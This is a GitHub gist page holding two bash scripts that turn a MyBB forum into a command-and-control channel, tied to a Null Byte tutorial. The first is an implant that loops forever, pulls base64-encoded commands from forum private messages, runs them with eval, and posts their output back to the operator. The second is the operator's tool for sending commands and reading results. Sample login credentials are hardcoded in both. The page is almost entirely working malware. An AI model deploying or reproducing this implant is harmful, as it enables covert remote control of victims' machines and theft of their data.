Skip to content

Instantly share code, notes, and snippets.

@tokyoneon
Created March 18, 2020 23:25
Show Gist options
  • Save tokyoneon/62feb0b63e6b6f0451acdd709ede39f8 to your computer and use it in GitHub Desktop.
Save tokyoneon/62feb0b63e6b6f0451acdd709ede39f8 to your computer and use it in GitHub Desktop.
MyCC - turn MyBB forums into C&C servers
#!/bin/bash
# https://null-byte.com/turn-forums-into-c-c-servers-0196708/
while true; do
forumUser="tokyoneon";
username="tokyoneon@email.com";
password="treHGFd76547^%$";
cookies='/tmp/forum_cookies';
function urlencode ()
{
old_lc_collate=$LC_COLLATE;
LC_COLLATE=C;
local length="${#1}";
for ((i = 0; i < length; i++ ))
do
local c="${1:i:1}";
case $c in
[a-zA-Z0-9.~_-])
printf "$c"
;;
*)
printf '%%%02X' "'$c"
;;
esac;
done;
LC_COLLATE=$old_lc_collate
};
enc_username="$(urlencode $username)";
enc_password="$(urlencode $password)";
login_request="$(curl -s -X POST --cookie-jar $cookies 'https://mybbforum.com/member.php' --data "username=$enc_username&password=$enc_password&remember=yes&submit=Login&action=do_login&url=https%3A%2F%2Fmybbforum.com%2Findex.php" -o /dev/null 2>&1)";
inboxCheck="$(curl -s --cookie $cookies 'https://mybbforum.com/private.php')";
inboxStatus="$(awk -v FS="(\" style=\"font-weight: bold;\">|</a></div> </div> <\!)" '{print $2}' <<< $inboxCheck)";
if [[ "$inboxStatus" = 'command' ]]; then
command="$(awk -v FS="(</a> titled <a href=\"|\" style=\"font-weight: bold;\">command)" '{print $2}' <<< $inboxCheck | sed 's/amp;//g')";
request="$(curl -s --cookie $cookies $command)";
encCommand="$(awk -v FS="(quote|/quote)" '{print $2}' <<< $request | awk '{print $2}')";
decCommand="$(base64 -D <<< $encCommand)";
response="$(eval $decCommand 2>&1 | base64 | tr -d '\n')";
if [[ -z "$response" ]]; then
response="$(printf '%s' 'no response detected in the terminal' | base64)";
fi;
sleep 61;
curl -s --cookie "$cookies" 'https://mybbforum.com/private.php?action=send' --data "my_post_key=e18f06e1685bacad0f9d94b0a42e2866&to=$forumUser&bcc=&subject=response&message=$response&action=do_send&pmid=0&do=&submit=Send+Message";
fi
sleep 180;
done
#!/bin/bash
# https://null-byte.com/turn-forums-into-c-c-servers-0196708/
clear;
function msg ()
{
echo -e "\n [mycc]> $1";
sleep 1.5
};
forumUser="tokyoneon";
username="tokyoneon@email.com";
password="treHGFd76547^%$";
cookies='/tmp/forum_cookies';
function urlencode ()
{
old_lc_collate=$LC_COLLATE;
LC_COLLATE=C;
local length="${#1}";
for ((i = 0; i < length; i++ ))
do
local c="${1:i:1}";
case $c in
[a-zA-Z0-9.~_-])
printf "$c"
;;
*)
printf '%%%02X' "'$c"
;;
esac;
done;
LC_COLLATE=$old_lc_collate
};
encUsername="$(urlencode $username)";
encPassword="$(urlencode $password)";
function cookie_detect ()
{
if [[ -n "$(grep -io 'mybbuser' $cookies)" ]]; then
msg "valid login detected";
else
msg "invalid login. check the cookies";
exit;
fi
};
function login_request ()
{
curl -s -X POST --cookie-jar $cookies 'https://mybbforum.com/member.php' --data "username=$encUsername&password=$encPassword&remember=yes&submit=Login&action=do_login&url=https%3A%2F%2Fmybbforum.com%2Findex.php" -o /dev/null 2>&1;
cookie_detect
};
function fetch_response ()
{
login_request;
inboxCheck="$(curl -s --cookie $cookies 'https://mybbforum.com/private.php')";
inboxStatus="$(grep -oP '(?<=font-weight: bold;">).*?(?=</a></div>)' <<< $inboxCheck)";
if [[ "$inboxStatus" = 'response' ]]; then
response="$(grep -oP '(?<=titled <a href=").*?(?=" style)' <<< $inboxCheck | sed 's/amp;//g' | xargs)";
msg "new inbox message detected";
request="$(curl -s --cookie "$cookies" "$response")";
encResponse="$(grep --color=no -A1 'scaleimages" id="pid_">' <<< $request| sed 's/<.*>//;s/<\/.*>//' | xargs)";
msg "encResponse = $encResponse";
decResponse="$(base64 -d <<< $encResponse)";
msg "\n$decResponse";
else
msg "no updates found on the server";
fi
};
function upload_command ()
{
msg "sleeping for 60 seconds";
sleep 61;
encCommand="$(base64 <<< $1 | tr -d '\n')";
curl -s --cookie "$cookies" 'https://mybbforum.com/private.php?action=send' --data "my_post_key=e18f06e1685bacad0f9d94b0a42e2866&to=$forumUser&bcc=&subject=command&message=$encCommand&action=do_send&pmid=0&do=&submit=Send+Message"
};
function user_command ()
{
login_request;
upload_command "$1"
};
function input_args ()
{
while [[ "$#" != 0 ]]; do
case "$1" in
-c | --command)
if [[ ! -n "$2" ]]; then
msg "invalid args. no command submitted.";
exit;
fi;
user_command "$2"
;;
-f | --fetch)
fetch_response
;;
esac;
shift;
done
};
if [[ ! -n "$1" ]]; then
msg "invalid arguments, use --fetch or --command";
exit;
fi;
input_args "$@"
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment